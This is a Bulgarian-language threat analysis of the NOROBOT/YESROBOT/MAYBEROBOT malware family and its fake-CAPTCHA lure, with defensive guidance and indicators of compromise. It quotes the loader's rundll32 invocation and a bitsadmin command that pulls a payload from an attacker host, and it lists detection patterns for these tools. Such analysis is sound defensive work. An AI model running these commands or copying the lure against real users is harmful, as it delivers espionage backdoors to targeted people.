През лятото на 2025 г. се появи ново, бързо еволюиращо семейство зловреден софтуер, което използва разкриването на импланта LOSTKEYS като основа и в рамките на седмици бе превърнато в инструмент за целенасочени кампании срещу политически съветници, неправителствени организации и дисиденти. Атаките се отличават с усъвършенствана социално-инженерна примка („COLDCOPY ClickFix“) и кратка, но гъвкава верига за изпълнение, базирана на DLL, стартиран чрез rundll32.

Ключови характеристики и еволюция

• Начален loader — NOROBOT: бърз loader, който се изпълнява чрез rundll32 iamnotarobot.dll,humanCheck. NOROBOT се разпространи дни след публичния анализ на LOSTKEYS и замества по-сложния PowerShell подход на предшественика.

• Етапи и реконфигурация: NOROBOT изтегля фрагменти от криптографски ключове и допълнителни компоненти от инфраструктура под контрол на нападателите, записва част от ключа в регистъра и планира задача за събиране/дешифриране на финалния payload.

• Вторична  полезност — YESROBOT (Python backdoor): първоначално внедрен във фрагменти, но въвежда шум при откриване поради включения Python интерпретатор.

• Третична итерация — MAYBEROBOT (PowerShell backdoor): опростена, без външен интерпретатор, по-малко „шумна“ за детекция и по-гъвкава за изпълнение на команди, предавани по HTTPS.

• Тактика за избягване на откриване: ротация на инфраструктура и имена на файлове, разделяне на криптографски ключове между етапите, използване на легитимни инструменти за изтегляне (bitsadmin) и планирани задачи за задържане на изпълнение.

Механика на инфекцията (високо ниво)

1. Целеви потребител посещава компрометиран сайт, представящ фалшив CAPTCHA (COLDCOPY ClickFix), който приканва за изпълнение на iamnotarobot.dll.

2. rundll32 iamnotarobot.dll,humanCheck зарежда NOROBOT loader.

3. Loader-ът използва легитимни механизми (напр. bitsadmin) за изтегляне на фрагменти от payload и частични ключове. Пример (от публично споделен анализ):

   bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py


4. Части от AES ключ се пишат в регистъра, планира се задача за сглобяване/дешифриране и се инсталира бекдор (YESROBOT или по-късно MAYBEROBOT).

5. Бекдорите са минимални локално и очакват сложните инструкции от оператор през HTTPS C2; това улеснява динамичното управление и намалява отпечатъка на вредоносния код.

Обзор на риска

• Целеви профил — високо стойностни индивиди и организации с чувствителна информация.

• Потенциални резултати — шпионаж, кражба на документи, дълготрайна дистанционна наличност (persistence) и използване на компрометирани машини за последващи удари.

• Използваните техники (DLL execution via rundll32, bitsadmin, scheduled tasks, registry storage) са класически, но съчетани стратегически, за да усложнят събирането на артефакти и възстановяването.

Препоръки за откриване и реагиране (отбранителни мерки)

1. Сигнатури и поведенчески правила

   • Следи за необичайни rundll32 инстанции, стартиращи DLL с имена, съдържащи „robot“, „human“, „check“, „healthcheck“ и подобни; разграничение чрез бели списъци при легитимни приложения.

   • Детектиране на необичайни bitsadmin заявки и необичайни изтегляния към местоположения извън обичайните домейни на организацията.

   • Мониторинг на създаване/изменение на Scheduled Tasks и на системни регистри с подозрително съдържание (особено съхранение на фрагменти от ключове или base64-блокове).

2. Корелация и криминалистика

   • Корелиране мрежови събития с файлови системни промени, записи в регистъра и планирани задачи, за да реконструкция на  етапите на инфекцията.

   • Събиране и запазване на следните артефакти за анализ: компрометиран HTML/JS на landing page, DLL файл (hash), записите от bitsadmin, задачи в Task Scheduler, подозрителни registry keys, outgoing HTTPS връзки и C2 домейни/IPS.

3. Ограничаване и смекчаване

   • Блокиране/инспектиране на домейни и URL адреси, свързани с наблюдавани кампании; внедряване на  DNS и URL filtering на мрежовата граница.

   • Деактивиране изпълнение на rundll32 за непознати DLL от непроверени пътища чрез AppLocker/Windows Defender Application Control или аналогични политики.

   • Ограничение на използването на bitsadmin и други администраторски инструменти за сваляне чрез Application Allowlisting и EDR политики.

   • Внедряване на строг контрол върху Scheduled Tasks и процеси, които могат да създават persistence — нотификации при създаване/смяна.

4. Профилактика и твърда защита

   • Обучение на потребителите за фишинг и фалшиви CAPTCHA примки; блокиране на изпълнение на непознати приложения от браузъра.

   • Редовни бекъпи, сегментация на мрежата и принцип на най-малки привилегии.

   • Преглед и завършване на inventory на външни зависимости — компрометирани уебсайтове и легитимни доставчици могат да служат като вектор.

5. Реакция при инцидент

   • При съмнение за проникване – изолиране на засегнатата машина, запазване на  volatile артефакти (памет, процес листи, мрежови връзки), извършване на  forensic imaging и корелиране със SIEM/EDR.

   • Промяна на  креденшъли и ключове, проверяване достъпа на администраторски акаунти и ревизия OAuth/SSO токени при съмнение за компромис.

   • Уведомяване на  засегнатите страни и при нужда органите за киберсигурност; споделяне IOC-и с доверени партньори.

Индикатори за компромис (IOC) — примерни елементи за наблюдение

Забележка: изброените имена и команди са събирани от публични анализи и служат единствено за детекция и отбрана. Не предоставят инструкции за злоупотреба.

• DLL име/експорт за наблюдение: iamnotarobot.dll и export humanCheck

• Команда за сваляне, използвана в анализите: bitsadmin /transfer downloadJob /download /priority normal https://.../libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py

• Поведение: записване на части от ключ в регистъра, създаване на Scheduled Task за сглобяване/дешифриране, outbound HTTPS към необичайни домейни.

• Файлови пътища: %APPDATA%\libsystemhealthcheck.py (и подобни имена със „healthcheck“/„system“/„lib…“), временни изпълними DLL имена с „robot/human/check“.

Заключение

Новото семейство, произлязло след LOSTKEYS, демонстрира бърза трансформация от по-сложен Python-базиран бекдор към по-лек PowerShell контрол, адаптиран за по-леко откриване и широко разпространение. Комбинацията от социално инженерство, разделени криптографски етапи и използване на легитимни административни инструменти прави това семейство предизвикателство за традиционните детекционни подходи. Оценката и отговорът трябва да са съчетани – технически мониторинг, политики за блокиране на изпълнение и обучение на потребителите – за да се намали рискът и да се пресече веригата на инфекция.